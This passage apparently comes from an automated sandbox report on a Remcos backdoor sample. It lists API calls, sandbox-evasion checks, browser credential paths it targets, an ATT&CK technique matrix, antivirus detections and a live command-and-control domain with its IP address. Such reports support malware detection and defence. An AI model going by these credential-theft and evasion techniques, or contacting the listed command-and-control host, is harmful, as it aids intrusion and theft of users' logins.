                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00406EEB ShellExecuteW,URLDownloadToFileW,0_2_00406EEB
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040F7E2 Sleep,ExitProcess,0_2_0040F7E2
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A7D9
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeWindow / User API: threadDelayed 4462Jump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeWindow / User API: threadDelayed 5046Jump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 6584Thread sleep count: 230 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 6584Thread sleep time: -115000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228Thread sleep count: 4462 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228Thread sleep time: -13386000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228Thread sleep count: 5046 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe TID: 2228Thread sleep time: -15138000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_0-48956
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00443355 mov eax, dword ptr fs:[00000030h]0_2_00443355
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_004120B2 GetProcessHeap,HeapFree,0_2_004120B2
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043503C
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB71
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00434BD8 SetUnhandledExceptionFilter,0_2_00434BD8
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00412132
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00419662 mouse_event,0_2_00419662
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerM5\.js+B3
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerM5\30\9B!
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerM5\
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager B(
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerM5\006B&
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, registros.dat.0.drBinary or memory string: [Program Manager]
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00434CB6 cpuid 0_2_00434CB6
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetLocaleInfoA,0_2_0040F90C
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_0045201B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_004520B6
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00452143
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetLocaleInfoW,0_2_00452393
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00448484
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004524BC
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004525C3
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452690
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: GetLocaleInfoW,0_2_0044896D
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451D58
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00451FD0
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread,0_2_00404F51
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_0041B69E GetComputerNameExW,GetUserNameW,0_2_0041B69E
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: 0_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449210
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040BA4D
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040BB6B
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: \key3.db0_2_0040BB6B

                        Remote Access Functionality

                        barindex
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-8AGIM5Jump to behavior
                        Source: Yara matchFile source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeCode function: cmd.exe0_2_0040569A
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts12
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Bypass User Account Control
                        2
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol211
                        Input Capture
                        2
                        Encrypted Channel
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts2
                        Service Execution
                        Logon Script (Windows)1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials In Files
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares3
                        Clipboard Data
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        NTDS2
                        File and Directory Discovery
                        Distributed Component Object ModelInput Capture1
                        Remote Access Software
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                        Process Injection
                        1
                        Masquerading
                        LSA Secrets23
                        System Information Discovery
                        SSHKeylogging2
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials21
                        Security Software Discovery
                        VNCGUI Input Capture22
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync1
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                        Process Injection
                        Proc Filesystem2
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe87%ReversingLabsWin32.Backdoor.Remcos
                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe86%VirustotalBrowse
                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe100%AviraBDS/Backdoor.Gen
                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        remcos2025rem.duckdns.org0%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        remcos2025rem.duckdns.org100%Avira URL Cloudmalware
                        remcos2025rem.duckdns.org0%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        remcos2025rem.duckdns.org
                        186.169.34.190
                        truetrueunknown
                        geoplugin.net
                        178.237.33.50
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://geoplugin.net/json.gpfalse
                            high
                            remcos2025rem.duckdns.orgtrue
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://geoplugin.net/json.gp(11732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://geoplugin.net/json.gp/C1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exefalse
                                high
                                http://geoplugin.net/json.gp91n1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://geoplugin.net/json.gpl1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.0000000000683000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://geoplugin.net/json.gpSystem321732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      186.169.34.190
                                      remcos2025rem.duckdns.orgColombia
                                      3816COLOMBIATELECOMUNICACIONESSAESPCOtrue
                                      178.237.33.50
                                      geoplugin.netNetherlands
                                      8455ATOM86-ASATOM86NLfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1559856
                                      Start date and time:2024-11-21 01:06:09 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 29s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:4
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                      Detection:MAL
                                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 38
                                      • Number of non-executed functions: 218
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240s for sample files taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
